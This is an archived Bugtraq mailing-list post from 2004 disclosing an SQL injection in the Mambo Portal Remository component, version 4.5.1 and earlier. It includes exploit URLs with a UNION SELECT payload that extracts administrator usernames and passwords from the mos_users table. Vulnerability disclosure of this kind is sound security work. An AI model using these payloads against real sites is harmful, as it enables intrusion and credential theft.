[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Mambo Portal lasted version 4.5.1 (1.09) and lower vesion : SQL injection Vulnerability.

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Mambo Portal lasted version 4.5.1 (1.09) and lower vesion : SQL injection Vulnerability.
From: khoaimi <kh0aimi@xxxxxxxxx>
Date: 18 Sep 2004 03:39:46 -0000


Vendor
www.mamboportal.com
Message from vendor : Mambo is one of the most powerful Open Source Content 
Management Systems on the planet. It is used all over the world for everything 
from simple websites to complex corporate applications. Mambo is easy to 
install, simple to manage, and reliable. 

Bug name : SQL injection
Version : lastest Version 4.5.1(1.0.9) and lower.

Exploit :

http://www.mamboportal.com/index.php?option=com_remository&Itemid=27&func=fileinfo&parent=folder&filecatid=499%20and%201=0[SQL]/*

You can exploit from the table "mos_users" with the query below

http://www.mambosite.com/index.php?option=com_remository&Itemid=[id]&func=selectfolder&filecatid=[id]%20and%201=0%20union%20all%20select%201,2,3,4,username,6,password,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%20from%20mos_users%20where%20usertype=0/*

with the values of usertype : 
 0 = superadministrator
 1 = administrator
 2 = editor
 3 = user
 5 = publisher
 6 = manager

Vendor feedback :
Not yet

Vendor patch :
Not yet

khoai
www.xfrog.org

Follow-Ups:
- Re: Mambo Portal lasted version 4.5.1 (1.09) and lower vesion : SQL injection Vulnerability.
  - From: Tim Broeker

Prev by Date: Re: FreeBSD kernel buffer overflow
Next by Date: Re: Multiple Vulnerabilities in phpScheduleIt
Previous by thread: RhinoSoft DNS4ME HTTP Server Vulnerabilities
Next by thread: Re: Mambo Portal lasted version 4.5.1 (1.09) and lower vesion : SQL injection Vulnerability.
Index(es):
- Date
- Thread